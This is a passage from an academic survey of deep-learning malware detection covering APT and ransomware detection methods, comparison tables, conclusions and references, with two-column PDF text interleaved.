curacy has been attained for the two datasets. Table 15 contrasts ings, 95.64%, 88.37%, and 98.85% accuracy are determined for the
the most recent methods used to identify IoT malware using C5.0 decision tree, Bayesian network, and 6-layer deep learning
Machine Learning. models, respectively. When compared to earlier work involving
APT attack detection on the NSL-KDD dataset, the 6-layer deep
6.5. APT detection techniques learning model exhibited the best execution and performance in
terms of accuracy.
An expensive and frequently used destructive attack on the The Strange Behaviour Inspection (SBI) model is implemented
target system is the Advanced Persistent Threat (APT) attack. for detecting APT attacks over the first potential victim [302].
For businesses, governments, and organizations’ information se- It mainly concentrates on watching the footsteps of APT attacks
curity systems, this attack has become a challenge. Using Ma- that investigated and selected behavioural characteristics of the
chine Learning or Deep Learning algorithms to examine clues potential victim machine. The credential dumping approach is
and unusual patterns in network data, methods for detecting and
used to stop APT attackers from obtaining complete user and
stopping APT assaults have gained popularity in recent years.
password lists and to stop data exfiltration by APT attackers.
Deep Belief Network (DBN) is utilized for malware detection
Additionally, it is used to keep an eye on dangerous activity on the
and the performance of the system is compared with the analysis
CPU, file systems, RAM, and Microsoft Windows registry. Based
of classical neural networks [300]. The performance analysis of
on the experimental results it is observed that, the SBI model
the malware detection system is done by the various ML classi-
attained 99.8% detection accuracy and reduced the detection time
fiers like DT, SVM, and KNN. Issues of signature-based methods
to 2.7 min.
are overcome by DBN and also allowed precise detection with the
Stacked Autoencoder with Long Short-Term Memory (SAE-
use of autoencoders, which reduces the feature set’s complexity.
LSTM) and Convolutional Neural Networks with Long Short-Term
Concealed executable program files are revealed with the help
of SVM, NB, and DT. To avoid the application of cryptographic Memory Network (CNN-LSTM) are employed in a hybrid deep
functions for gaining money, the Maximal Frequent Pattern of learning technique to evaluate large amounts of network traffic
live ransomware is exploited [46]. MLP algorithm is utilized for in order to look for signs of APT assaults [303]. The proposed
analysing the threat. It attains an accuracy rate of 99% with a approach is assessed using the valid dataset ‘‘DAPT2020’’, which
time of 10 s. Some families of ransomware are not detectable by includes all APT stages. The experimental findings show that, for
MLP which can be resolved using Dynamic Link Libraries which detecting malicious behaviour in each APT stage, the hybrid deep
also minimizes the false +ve rate. RNN is utilized for detecting learning technique outperformed the individual deep learning
malwares at earlier stages by analysing the behaviours of static model.
and dynamic data with the help of a sandbox [34]. Besides, RNN A combined deep learning model is used to detect APT assaults
with Hidden Markov Models provides the maximum accuracy based on network traffic analysis [304]. In order to study and de-
rate for forecasting malware. Malicious payloads are prohibited, tect indications of APT assaults in network traffic, separate deep
reducing the risk of malware vulnerabilities. It accurately reduces learning networks including multilayer perceptron (MLP), con-
the detection time by 94% i.e. within 5 s. volutional neural network (CNN), and long short-term memory
It is challenging to identify an APT attack because of how long (LSTM) are sought after, created, and integrated into combined
they stay active on the network and the risk that their huge deep learning networks. Extracting IP features based on flow
traffic volume would cause the system to crash. By automatically and classifying APT attack IPs are the two main steps that the
extracting and choosing the features in the neural network’s hid- combined deep learning model executes in order to detect APT
den layers, a 6-layer deep learning model is suggested [301]. For attack signals. Combined deep learning model demonstrated in
28
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 16
Comparison of recent APTs detection techniques using DL.
Research paper Features Type of malware Algorithms of classification
Xuan et al. (2022) [306] GCN, GIN, behaviour profile, APT Deep graph network
Li et al. (2022) [305] Edge game and edge AI, Edge Bayesian APT Explainable Intelligence-Driven
Stackelberg game Defence Mechanism
Xuan et al. (2021) [304] Network traffic analysis, MLP, CNN, LSTM APT Combined deep learning model
Alrehaili et al. (2021) [303] SAE-LSTM, CNN-LSTM, DAPT2020 APT Hybrid deep learning technique
Mohamed et al. (2021) [302] Credential dumping technique, footsteps of APT SBI Model
APT attack, first potential victim
Hassannataj et al. (2020) [301] NSL-KDD dataset, C5.0 decision trees, APT 6-layer deep learning model
Bayesian networks
Rhode et al. (2018) [34] Behaviours APT RNN with Hidden Markov Model

the experimental segment their improved capacity to guarantee its stages based on Deep Neural Network (DNN) and Batch Nor-
accuracy on all measurements ranging from 93 to 98%. malization (BN). Every edge gateway module is associated asyn-
An explainable intelligence-driven APT defence mechanism is chronously with neighbours. This model handles homogeneous
proposed on the basis of an edge game and edge AI (Artificial In- and heterogeneous data and combats evasion attacks. X-IIoTID,
telligence) approach [305]. Real-time APT detection, intelligence ISOT, and NSL-KDD datasets are used for validating the proposed
generation and explanatory functions analysis are supported by experimental setup and robustness is evaluated by implementing
the proposed mechanism. Edge Bayesian Stackelberg game and black-and-white box evasion attack methods.
threat intelligence-based defence strategy model is developed Deep Convolutional Generative Adversarial Network (DCGAN)
for balancing rapid response and resource allocation. Defendant and Transferred Generating Adversarial Network-Intrusion Detec-
and attacker interactions are modelled in it. APT defence game tion System (TGAN) based dual generative adversarial networks
is provided with equilibrium and existence conditions. Optimal detection framework is proposed to detect attacks of anony-
solutions for attackers and defenders are provided for various mous variant encrypted ransomware [309]. In TGAN, the transfer
kinds of resource budgets. It provides edge device protection learning mechanism is utilized for enhancing adversarial sample
against attack models over dynamic games. generation ability and detection ability. In addition, the recon-
In order to detect APT malwares over workstations, a deep- struction loss function is established for increasing the ability
graph network-based method is proposed by analysing the be- of the discriminator. CICIDS2017, KDD99, SWaT and WADI ran-
haviour profile of malware [306]. It consists of two primary somware datasets are utilized for experimentation. The perfor-
tasks. In the first task, behaviour profiles of malware are built mance of TGAN-IDS is evaluated with the metrics like detection
on the basis of collecting and validating event IDs of kernel accuracy, recall and F1-score. Table 17 provides a summary of
workstations. Results are obtained with the labels of normal, ma- recently proposed DL-based Ransomware detection techniques.
licious, suspicious or unknown after the completion of building
behaviour profiles. In the second task, malwares are detected 7. Inference
on the basis of analysing behaviour profiles with the help of a
Graph Convolutional Network (GCN) where the Graph Isomor- In this section, conclusions drawn by this comprehensive ex-
phism Network (GIN) method is utilized. Results depicted 90.57% amination are presented.
accuracy, 90.51% precision, and 90.57% recall attained during
experimentation. The latest DL-based APT detection techniques • Malware detection methods with 100% efficiency in terms
are compared in Table 16. of accuracy, TPR, FPR, precision, and recall are a nightmare
for developers because new generation malwares are coded
6.6. Ransomware detection techniques in a complicated manner and advanced evasion techniques
are employed against familiar protection mechanisms like
Ransomware represents a very significant threat since new firewalls and anti-viruses.
families and variants are consistently being discovered on the • Static analysis techniques cannot handle malwares incor-
internet and dark web. Because of the nature of the encryption porated with obfuscation techniques. It does not opt for
techniques they employ, ransomware outbreaks are challenging the run time environment but it provides better results for
to recover from. This rise in ransomware is also related to the familiar malware families.
expansion of artificial intelligence. After Machine Learning, Deep • Behaviour and signature-based approaches fail to battle
Learning can identify zero-day threats; hence there is great in- with obfuscation techniques implemented in malwares. So
terest in researching Deep Learning-based ransomware detection dynamic analysis is applied. Later, a combination of both
methods. Deep Ransomware Threat Hunting and Intelligence Sys- static and dynamic analysis (hybrid analysis) techniques is
tem (DRTHIS) is implemented for segregating the samples into employed for efficient results.
malicious or benign and to relate the family of ransomware with • Visualization techniques and image-based analysis tech-
it [307]. To classify ransomware, CNN is combined with LSTM niques are incorporated to create the feature set based on
with the help of the Softmax algorithm and results are obtained images to reduce complexity. Further Deep Learning models
as 97.2% TPR and 2.7% FPR. like CNN and RNN are utilized alone or with a combination
An Industrial IoT-based ransomware detection model is devel- of ML classifiers.
oped by utilizing Asynchronous Peer-to-Peer Federated Learning • Over 50% of digitally connected people are using windows
(AP2PFL) and Deep Learning (DL) techniques [308]. This model in this world. To avoid the increased number of violations
comprises two modules which are Data Purifying Model (DPM) in the Windows environment hybrid analysis methods are
and Diagnostic and Decision Module (DDM). DPM involves data applied for feature extraction and Deep Learning models like
refinement and representation using Contractive Denoising Auto- CNN are employed for classifying malwares instead of ML
Encoder (CDAE). DDM is utilized for identifying ransomware and classifiers.
29
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 17
Comparison of recent Ransomware detection techniques using DL.
Type of method Research paper Features Algorithms of classification
Network traffic monitoring based Zhang et al. (2022) [309] CICIDS2017, KDD99, SWaT, WADI, transfer learning DCGAN & TGAN
Others Al-Hawawreh et al. (2021) [308] DPM, DDM, DNN, BN AP2PFL
API calls based Homayoun et al. (2019) [307] CNN, LSTM, Softmax algorithm DRTHIS

• The Internet of Things is expanding since every gadget is Data availability

now interconnected. Even the companies that make these
devices lack the necessary expertise. A combination of ML Data will be made available on request.
classifiers and DL models is encouraged for classification.
By using both static and dynamic analysis, feature extrac- Acknowledgments
tion parameters including heuristics, power usage, colour
images, and byte sequences are also used. The authors would like to thank VIT-AP University, the editors
• APTs are specifically designed for performing denial-of- and the reviewers. The authors would like to thank Dr. S. V.
service attacks. Predicting APTs before the beginning of Kota Reddy, Vice Chancellor, VIT-AP University for his continuous
the runtime environment is a tough and risky task. Re- support and encouragement. A special thanks to Dr. Hari Seetha,
cent detection methods of APTs utilize an automatic detec- Dr. Ganesh Reddy Karri, Devi Priya V.S and the team members of
tion framework considering features based on a socket, IP Center of Excellence, Cyber Security & Artificial Intelligence and
address, open XML, real-time traffic, etc. Robotics (AIR), VIT-AP University. The author Mr. M. Gopinath
• Private confidential information is targeted that applies would like to thank Miss. Winny Elizabeth Philip for continuously
cryptographic functions in ransomware attacks. Recent ran- supporting and helping to carryout this research.
somware detection techniques can be classified into differ-
ent types based on their methods such as (i). Behaviour- References
based, (ii). IRP monitoring-based, (iii). NW traffic
monitoring-based, (iv). Memory-based, (v). API calls-based, [1] R. Anderson, et al., Measuring the cost of cybercrime, in: The Economics
(vi). Android environment-based and other methods ensu- of Information Security and Privacy, Springer, Berlin, Germany, 2013, pp.
265–300.
ing from the above.
[2] https://ciso.economictimes.indiatimes.com/news/most-firms-see-rise-in-
• The android environment seems more unsafe than Mac OS cyberattacks-during-pandemic-survey/75043660.
where personal information is mainly targeted. Mobile mal- [3] https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-covid-
ware detection methods utilize static, dynamic, and image- 19-report-reveals-pandemic-threat-evolution/.
based analysis techniques. For feature extraction also ML [4] https://www.marketsandmarkets.com/Market-Reports/malware-analysis-
classifiers are utilized and classification is performed by market-108766513.html.
[5] https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_
adopting DL models. Report_2019-2020.pdf.
• From the overall observation of the current scenario, mal- [6] Priyanka Dixit, Sanjay Silakari, Deep learning algorithms for cybersecurity
ware detection methods should be accompanied by (i). An applications: A technological and status review, Comp. Sci. Rev. (ISSN:
intelligent system (ii). Automotive detection mechanisms 1574-0137) 39 (2021) 100317.
and (iii). Earlier stage detection without any delay. These [7] Omer Aslan, Refik Samet, A comprehensive review on malware detection
approaches, IEEE Trans. 8 (2020) 6249–6271.
factors would implement a protection mechanism which
[8] Y. Li, K. Xiong, T. Chin, C. Hu, A machine learning framework for domain
would help combat new generation malwares effectively. generation algorithm-based malware detection, IEEE Access 7 (2019)
32765–32782.
8. Conclusion [9] E. Gandotra, D. Bansal, S. Sofat, Malware analysis and classification: a
survey, J. Inf. Secur. 5 (2014) 56–64.
[10] N. Udayakumar, V.J. Saglani, A.V. Cupta, T. Subbulakshmi, Malware clas-
Being proactive rather than reactive is a key lesson that se- sification using machine learning algorithms, in: 2018 2nd International
curity gives us. Today, developing a malware detection system is Conference on Trends in Electronics and Informatics, ICOEI, Tirunelveli,
challenging, especially when dealing with new generation mal- 2018, pp. 1–9.
ware. Advanced evasion strategies have enabled the evolution of [11] M. Alazab, S. Venkataraman, P. Watters, Towards understanding malware
behaviour by the extraction of API calls, in: Proc. 2nd Cybercrime
new generations of malware, which had very significant effects.
Trustworthy Comput. Workshop, Jul. 2010, Vol. 7, 2019, pp. 52–59, 46736.
However, Deep Learning-based malware detection technology [12] M. Tang, M. Alazab, Y. Luo, Big data for cybersecurity: Vulnerability
reduces the flaws of both conventional and traditional methods. disclosure trends and dependencies, IEEE Trans. Big Data 5 (3) (2019)
This paper presents a systematic review of malware detection 317–329.
using Deep Learning techniques. On the basis of the evolution [13] D. Gibert, C. Mateu, J. Planes, A hierarchical convolutional neural network
for malware classification, in: The International Joint Conference on
towards Deep Learning-based techniques, research taxonomy is
Neural Networks 2019, IEEE, 2019, pp. 1–8.
proposed. Recent techniques for detecting malware on Android, [14] M. Alazab, Profiling and classifying the behavior of malicious codes, J.
iOS, IoT, Windows, APTs, and Ransomware are also explored and Syst. Softw. 100 (2015) 91–102.
compared. Finally, by giving researchers a thorough understand- [15] S. Huda, J. Abawajy, M. Alazab, M. Abdollalihian, R. Islam, J. Yearwood,
ing of malware analysis, this study will steer researchers in the Hybrids of support vector machine wrapper and filter based framework
for malware detection, Future Gener. Comput. Syst. 55 (2016) 376–390.
appropriate path for developing mitigation approaches for both
[16] M. Alazab, S. Venkatraman, P. Watters, M. Alazab, A. Alazab, Cybercrime:
conventional and complex malware. The case of obfuscated malware, in: C.K. Georgiadis, H. Jahankhani, E.
Pimenidis, R. Bashroush, A. Al-Nemrat (Eds.), Global Security, Safety and
Declaration of competing interest Sustainability & e-Democracy, in: Lecture Notes of the Institute for Com-
puter Sciences, Social Informatics and Telecommunications Engineering,
vol. 99, Springer, Berlin, Germany, 2012.
The authors declare that they have no known competing finan- [17] E. Raff, J. Sylvester, C. Nicholas, Learning the PE header, malware detection
cial interests or personal relationships that could have appeared with minimal domain knowledge, in: Proc. 10th ACMWorkshop Artif.
to influence the work reported in this paper. Intell. Secur, ACM, New York, NY, USA, 2017, pp. 121–132.

30
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

[18] C. Rossow, et al., Prudent practices for designing malware experiments: [43] W. Han, J. Xue, Y. Wang, Z. Liu, Z. Kong, Malinsight: a systematic
Status quo and outlook, in: Proc. IEEE Symp. Secur. Privacy, SP, 2012, pp. profiling based malware detection framework, J. Netw. Comput. Appl.
65–79. 125 (2019b) 236–250, http://www.sciencedirect.com/science/article/pii/
[19] H.S. Anderson, A. Kharkar, B. Filar, P. Roth, Evading Machine Learning S1084804518303503.
Malware Detection, Black Hat, New York, NY, USA, 2017. [44] T. Duc Nguyen, S. Marchal, A.-R. Sadeghi, DÏoT: a self-learning system for
[20] R. Verma, Security analytics: Adapting data science for security chal- detecting compromised IoT devices, in: Proc. 39th IEEE Int. Conf. Distrib.
lenges, in: Proc. 4th ACM Int. Workshop Secur. Privacy Anal., ACM, New Comput. Syst., IEEE, 2019.
York, NY, USA, 2018, pp. 40–41. [45] F. Wu, L. Xiao, J. Zhu, Bayesian model updating method based android
[21] Y. LeCun, Y. Bengio, G. Hinton, Deep learning, Nature 521 (7553) (2015) malware detection for IoT services, in: 2019 15th International Wireless
436–444. Communications and Mobile Computing Conference, IWCMC 2019, IEEE,
[22] Sudhakar, S. Kumar, An emerging threat fileless malware: a survey and 2019, pp. 61–66.
research challenges, Cybersecur 3 (2020) 1. [46] M. Moradi, M. Zulkernine, A neural network based system for intrusion
[23] Sibi Chakkaravarthy, D. Sangeetha, V. Vaidehi, A survey on malware detection and classification of attacks, in: Proceedings of the IEEE In-
analysis and mitigation techniques, Comp. Sci. Rev. 32 (2019) 1–23. ternational Conference on Advances in Intelligent Systems-Theory and
[24] Daniel Gibert, Carles Mateu, Jordi Planes, The rise of machine learning for Applications, 2004, pp. 15–18.
detection and classification of malware: Research developments, trends [47] H. Zhu, Y. Li, R. Li, J. Li, Z. You, H. Song, SEDMDroid: An enhanced stacking
and challenges, J. Netw. Comput. Appl. (ISSN: 1084-8045) 153 (2020) ensemble framework for android malware detection, IEEE Trans. Netw.
102526. Sci. Eng. 8 (2) (2021) 984–994.
[25] N. Koroniotis, N. Moustafa, E. Sitnikova, Forensics and deep learning [48] Gurumayum Akash Sharma, Khundrakpam Johnson Singh, Maisnam De-
mechanisms for botnets in internet of things: A survey of challenges and babrata Singh, A deep learning approach to image-based malware
solutions, IEEE Access 7 (2019) 61764–61785. analysis, progress in computing, analytics and networking, in: Advances
[26] Priyanka Dixit, Sanjay Silakari, Deep learning algorithms for cybersecurity in Intelligent Systems and Computing 1119, 2020, pp. 327–339.
applications: A technological and status review, Comp. Sci. Rev. (ISSN: [49] A. Irshad, R. Maurya, M.K. Dutta, R. Burget, V. Uher, Feature optimization
1574-0137) 39 (2021) 100317. for run time analysis of malware in windows operating system using
[27] A. Davis, M. Wolff, Deep learning on disassembly data, 2015, machine learning approach, in: 2019 42nd International Conference on
URL. https://www.blackhat.com/docs/us-15/materials/us-15-Davis-Deep- Telecommunications and Signal Processing, TSP, Budapest, Hungary, 2019,
Learning-On-Disassembly.pdf. pp. 255–260.
[28] R. Pascanu, J.W. Stokes, H. Sanossian, M. Marinescu, A. Thomas, Mal- [50] Z.A. Genç, G. Lenzini, P.Y.A. Ryan, No random, no ransom: a key to stop
ware classification with recurrent networks, in: 2015 IEEE International cryptographic ransomware, in: C. Giuffrida, S. Bardin, G. Blanc (Eds.),
Conference on Acoustics, Speech and Signal Processing, ICASSP, 2015, p. DIMVA 2018, in: LNCS, vol. 10885, Springer, Cham, 2018, pp. 234–255.
1916e1920, http://dx.doi.org/10.1109/ICASSP.2015.7178304. [51] T. Shibahara, T. Yagi, M. Akiyama, D. Chiba, T. Yada, Efficient dynamic
[29] O.D. Gibert Llaurad, Convolutional Neural Networks for Malware malware analysis based on network behavior using deep learning, in:
Classification (Master’s thesis), Universitat Politfiecnica de Catalunya, Proc. IEEE Global Commun. Conf., GLOBECOM, 2016, pp. 1–7.
2016. [52] B. Kolosnjaji, A. Zarras, G. Webster, C. Eckert, Deep learning for classifi-
[30] M. Ahmadi, D. Ulyanov, S. Semenov, M. Trofimov, G. Giacinto, Novel cation of malware system call sequences, in: Proc. Australas. Joint Conf.
feature extraction, selection and fusion for effective malware family Artif. Intell., Springer, Cham, Switzerland, 2016, pp. 137–149.
classification, in: Proceedings of the Sixth ACM Conference on Data and [53] E. Raff, et al., An investigation of byte n-gram features for malware
Application Security and Privacy, CODASPY ’16, ACM, New York, NY, USA, classification, J. Comput. Virol. Hacking Tech. 14 (1) (2018) 1–20.
2016, p. 183e194.
[54] H.S. Anderson, P. Roth, EMBER: An open dataset for training static
[31] W. Hardy, L. Chen, S. Hou, Y. Ye, X. Li, Dl4md: A Deep Learning PE malware machine learning models, 2018, https://arxiv.org/abs/1804.
Framework for Intelligent Malware Detection, The Steering Committee 04637.
of The World Congress in Computer Science, Computer Engineering and
[55] https://arxiv.org/abs/1804.04637.
Applied Computing (WorldComp), Athens, 2016, p. 61e67.
[56] https://www.unb.ca/cic/datasets/.
[32] O.E. David, N.S. Netanyahu, Deepsign: deep learning for automatic mal-
[57] https://www.sonicwall.com/2022-cyber-threat-report/sonicwall-cyber-
ware signature generation and classification, in: 2015 International Joint
threat-report-thank-you/.
Conference on Neural Networks, IJCNN, 2015, p. 1e8.
[58] J. Saxe, K. Berlin, Deep neural network based malware detection using
[33] E. Raff, J. Barker, J. Sylvester, R. Brandon, B. Catanzaro, C. Nicholas,
two dimensional binary program features, in: Proc. 10th Int. Conf.
Malware detection by eating a whole exe, 2017, [Online]. Available:
Malicious Unwanted Softw. (Malware), 2015, pp. 11–20.
https://arxiv.org/abs/1710.09435.
[34] M. Rhode, P. Burnap, K. Jones, Early-stage malware prediction using [59] TaeGuen Kim, BooJoong Kang, Mina Rho, Sakir Sezer, Eul Gyu Im, A
recurrent neural networks, Comput. Secur. 77 (2018) 578–594. multimodal deep learning method for android malware detection using
various features, IEEE Trans. Inf. Forensics Secur. http://dx.doi.org/10.
[35] M. Krcál, O. vec, M. Bálek, O. Jaek, Deep convolutional malware classifiers
1109/TIFS.2018.2866319.
can learn from raw executables and labels only, 2018, [Online]. Available:
https://openreview.net/forum?id=HkHrmM1PM. [60] Zhiang Fang, Junfeng Wang, Boya Li, Siqi Wu, Yingjie Zhou, Haiying
[36] E. Rezende, G. Ruppert, T. Carvalho, A. Theophilo, F. Ramos, P. de Geus, Huang, Evading Anti-Malware Engines with Deep Reinforcement Learning,
Malicious software classification using VGG16 deep neural network’s bot- Vol 7, IEEE, 2019, pp. 48867–48879.
tleneck features, in: Information Technology-New Generations, Springer, [61] A. Damodaran, F. Di Troia, C.A. Visaggio, T.H. Austin, M. Stamp, A
Cham, Switzerland, 2018, pp. 51–59. comparison of static, dynamic, and hybrid analysis for malware detection,
[37] A.F. Agarap, F.J.H. Pepito, Towards building an intelligent anti-malware J. Comput. Virol. Hacking Tech. 13 (1) (2017) 1–12.
system: A deep learning approach using support vector machine (SVM) [62] Wei Zhong, Feng Gu, A multi-level deep learning system for malware
for malware classification, 2017. detection, Expert Syst. Appl. 133 (2019) 151–162.
[38] W. Huang, J.W. Stokes, Mtnet: A multi-task neural network for dynamic [63] R. Vinayakumar, Mamoun Alazab, K.P. Soman, Prabaharan Poor-
malware classification, in: Proc. Int. Conf. Detection Intrusions Mal- nachandran, Sitalakshmi Venkatraman, Robust intelligent Malware
ware, Vulnerability Assessment, Springer, Cham, Switzerland, 2016, pp. detectionusing deep learning, IEEE Trans. 7 (2019) 46717–46738.
399–418. [64] M. Alazab, S. Venkatraman, P. Watters, M. Alazab, Zero-day malware
[39] A. Feizollah, N.B. Anuar, R. Salleh, G. Suarez-Tangil, S. Furnell, Andro- detection based on supervised learning algorithms of API call signatures,
dialysis: analysis of android intent effectiveness in malware detection, in: Proc. 9th Australas. Data Mining Conf., Vol. 121, Australian Computer
Comput. Secur. 65 (2017) 121–134. Society, Ballarat, Australia, 2011, pp. 171–182.
[40] Zhiang Fang, Jun Yeonjoon Wang, Jiaxuan Geng, Xuan Khan, Feature [65] Azmoodeh, Choo, Robust malware detection for internet of (battlefield)
Selection for Malware Detection Based on Reinforcement Learning, Vol. things devices using deep eigenspace learning, IEEE Trans. Sustain.
7, IEEE, 2019, 176177-176187. Comput. (2018) http://dx.doi.org/10.1109/TSUSC.2018.2809665.
[41] I. Firdausi, C. lim, A. Erwin, A.S. Nugroho, Analysis of machine learning [66] L. Nataraj, A Signal Processing Approach to Malware Analysis, Univ.
techniques used in behaviorbased malware detection, in: Proceedings of California, Santa Barbara, CA, USA, 2015.
the 2nd International Conference Advances on Computing Control, and [67] L. Nataraj, B.S. Manjunath, SPAM: Signal processing to analyze malware,
Telecommunications Technology, 2010, pp. 201–203. 2016, [Online]. Available: https://arxiv.org/abs/1605.05280.
[42] W. Han, J. Xue, Y. Wang, L. Huang, Z. Kong, L. Mao, Maldae: detecting [68] L. Nataraj, D. Kirat, B.S. Manjunath, G. Vigna, Sarvam: Search and retrieval
and explaining malware based on correlation and fusion of static and of malware, in: Proc. Annu. Comput. Secur. Conf. (ACSAC) Worshop Next
dynamic characteristics, Comput. Secur. 83 (2019a) 208–233. Gener. Malware Attacks Defence, NGMAD, 2013, pp. 1–9.

31
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

[69] L. Nataraj, V. Yegneswaran, P. Porras, J. Zhang, A comparative assessment [93] K.S. Han, J.H. Lim, B. Kang, et al., Malware analysis using visualized images
of malware classification using binary texture analysis and dynamic and entropy graphs, Int. J. Inf. Secur. 14 (1) (2015) 1–14.
analysis, in: Proc. 4th ACM Workshop Secur. Artif. Intell., ACM, New York, [94] M.M. Alani, A.I. Awad, PAIRED: An explainable lightweight android
NY, USA, pp. 21–30. malware detection system, IEEE Access 10 (2022) 73214–73228.
[70] L. Nataraj, G. Jacob, B.S. Manjunath, Detecting Packed Executables Based [95] K. Rieck, P. Trinius, C. Willems, T. Holz, Automatic analysis of malware
on Raw Binary Data, Tech. Rep., Univ. California, Santa Barbara, CA, USA, behavior using machine learning, J. Comput. Secur. 19 (4) (2011) 639–668.
2010. [96] S. Rasthofer, S. Arzt, E. Bodden, A machine-learning approach for classi-
[71] M. Farrokhmanesh, A. Hamzeh, A novel method for malware detection fying and categorizing android sources and sinks, in: Proceedings of the
using audio signal processing techniques, in: Proc. Artif. Intell. Robot., Network and Distributed System Security Symposium, 2014, pp. 23–26.
IRANOPEN, 2016, pp. 85–91. [97] G. Schwenk, K. Rieck, Adaptive detection of covert communication in
[72] D. Kirat, L. Nataraj, G. Vigna, B.S. Manjunath, SigMal: A static signal HTTP requests, in: Proceedings of the 7th European Conference on
processing based malware triage, in: Proc. 29th Annu. Comput. Secur. Comput. Netw. Defence (EC2ND’11), 2011, pp. 25–32.
Appl. Conf., ACM, New York, NY, USA, 2013, pp. 89–98. [98] N. Nissim, Y. Lapidot, A. Cohen, Y. Elovici, Trusted system-calls analysis
[73] Yongkang Jiang, Shenghong Li, Yue Wu(B), Futai Zou, A novel image-based methodology aimed at detection of compromised virtual machines using
malware classification model using deep learning, in: 26th International sequential mining, Knowl.-Based Syst. 153 (2018) (2018) 147–175.
Conference, ICONIP 2019 Sydney, NSW, Australia, December 12–15, 2019 [99] G. Hospodar, B. Gierlichs, E. De Mulder, I. Verbauwhede, J. Vandewalle,
Proceedings, Part II. Machine learning in side-channel analysis: A first study, J. Cryptogr. Eng.
[74] D. Gibert, J. Bjar, C. Mateu, J. Planes, D. Solis, R. Vicens, Convolutional 1 (4) (2011) 293–302.
neural networks for classification of malware assembly code, in: Recent [100] J. Demme, et al., On the feasibility of online malware detection with
Advances in Artificial Intelligence Research and Development - Proceed- performance counters, ACM SIGARCH Comput. Archit. News 41 (3) (2013)
ings of the 20th International Conference of the Catalan Association for 559.
Artificial Intelligence, Deltebre, Terres de l’Ebre, Spain, October 25-27, [101] A. Nazari, N. Sehatbakhsh, M. Alam, A. Zajic, M. Prvulovic, EDDIE: EM-
2017, 2017, pp. 221–226. based detection of deviations in program execution, in: Proceedings of the
[75] D. Gibert, C. Mateu, J. Planes, An end-to-end deep learning architecture for 44th Annual International Symposium on Computer Architecture, ISCA’17,
classification of malware’s binary content, in: V. Krkov, Y. Manolopoulos, 2017, pp. 333–346.
B. Hammer, L. Iliadis, I. Maglogiannis (Eds.), Artificial Neural Networks [102] T.N. Nguyen, Q.-D. Ngo, H.-T. Nguyen, G.L. Nguyen, An advanced com-
a8nd Machine Learning ICANN 2018, Springer International Publishing, puting approach for IoT-botnet detection in industrial internet of things,
Cham, 2018, pp. 383–391. IEEE Trans. Ind. Inform. 18 (11) (2022) 8298–8306.
[76] K. Kosmidis, C. Kalloniatis, Machine learning and images for malware [103] M.’. Husainiamer, M.M. Saudi, A. Ahmad, Classification for iOS mobile
detection and classification, 2017. malware inspired by phylogenetic: Proof of concept, in: 2020 IEEE
[77] D. Gibert, C. Mateu, J. Planes, R. Vicens, Using convolutional neural Conference on Open Systems, ICOS, 2020, pp. 59–63.
networks for classification of malware represented as images, J. Comput. [104] J. Jeon, J.H. Park, Y. Jeong, Dynamic analysis for IoT malware detec-
Virol. Hacking Tech. (2018). tion with convolution neural network model, IEEE Access 8 (2020)
96899–96911.
[78] D. Gibert, C. Mateu, J. Planes, R. Vicens, Classification of malware by using
[105] A. Pekta, T. Acarman, Classification of malware families based on runtime
structural entropy on convolutional neural networks, in: IAAI Conference
behaviors, J. Inf. Secur. Appl. 37 (2017) 91–100.
on Artificial Intelligence, 2018b, pp. 7759–7764.
[106] Microft: Sam cybersecurity engagement kit, Internet (2018) https://assets.
[79] M. Dib, S. Torabi, E. Bou-Harb, C. Assi, A multi-dimensional deep learning
microsoft.com/en-nz/cybersecurity-sam-engagement-kit.pdf.
framework for IoT malware classification and family attribution, IEEE
[107] Y. Ye, T. Li, D.A. Adjeroh, S.S. Iyengar, A survey on Malware detection
Trans. Netw. Serv. Manag. 18 (2) (2021) 1165–1177.
using data mining techniques, ACM Comput. Surv. 50 (3) (2017) 41.
[80] G.E. Dahl, J.W. Stokes, L. Deng, D. Yu, Large-scale malware classification
[108] L. Nataraj, S. Karthikeyan, G. Jacob, B.S. Manjunath, Malware images:
using random projections and neural networks, in: 2013 IEEE Interna-
Visualization and automatic classification, in: Proc. 8th Int. Symp. Vis.
tional Conference on Acoustics, Speech and Signal Processing, 2013, pp.
Cyber Secur., ACM, New York, NY, USA, 2011, p. 4.
3422–3426.
[109] J. Yan, Y. Qi, Q. Rao, Detecting malware with an ensemble method based
[81] Z. Yuan, Y. Lu, Z. Wang, Y. Xue, Droid sec: Deep learning in Android
on deep neural network, Secur. Commun. Netw. 16 (2018).
malware detection, ACM SIGCOMM Comput. Commun. Rev. 44 (4) (2014)
[110] T.M. Kebede, O. Djaneye-Boundjou, B.N. Narayanan, A. Ralescu, D. Kapp,
371–372.
Classification of malware programs using autoencoders based deep
[82] Y. Bengio, Learning deep architectures for AL, Found. Trends Mach. Learn.
learning architecture and its application to the Microsoft Malware clas-
2 (1) (2009) 1–127.
sification challenge (big 2015) dataset, in: 2017 IEEE National Aerospace
[83] Y. LeCun, Y. Bengio, et al., Convolutional networks for images, speech, and and Electronics Conference, NAECON, IEEE, 2017, pp. 70–75, A Novel
time series, Handb. Brain Theory Neural Netw. 3361 (10) (1995) 1995. Image-Based Malware Classification Model Using Deep Learning 161.
[84] A. Krizhevsky, I. Sutskever, G.E. Hinton, Imagenet classification with [111] H.-J. Kim, Image-based malware classification using convolutional neural
deep convolutional neural networks, in: Advances in Neural Information network, in: J.J. Park, V. Loia, G. Yi, Y. Sung (Eds.), CUTE/CSA -2017, in:
Processing Systems, 2012, p. 1097e1105. LNEE, vol. 474, Springer, Singapore, 2018, pp. 1352–1357.
[85] Quan Le, Oisín Boydell, Brian Mac Namee, Mark Scanlon, Deep learning [112] F.C.C. Garcia, F.P. Muga, Random forest for malware classification,
at the shallow end: Malware classification for non-domain experts, Digit. Cryptogr. Secur. (2016) arXiv.
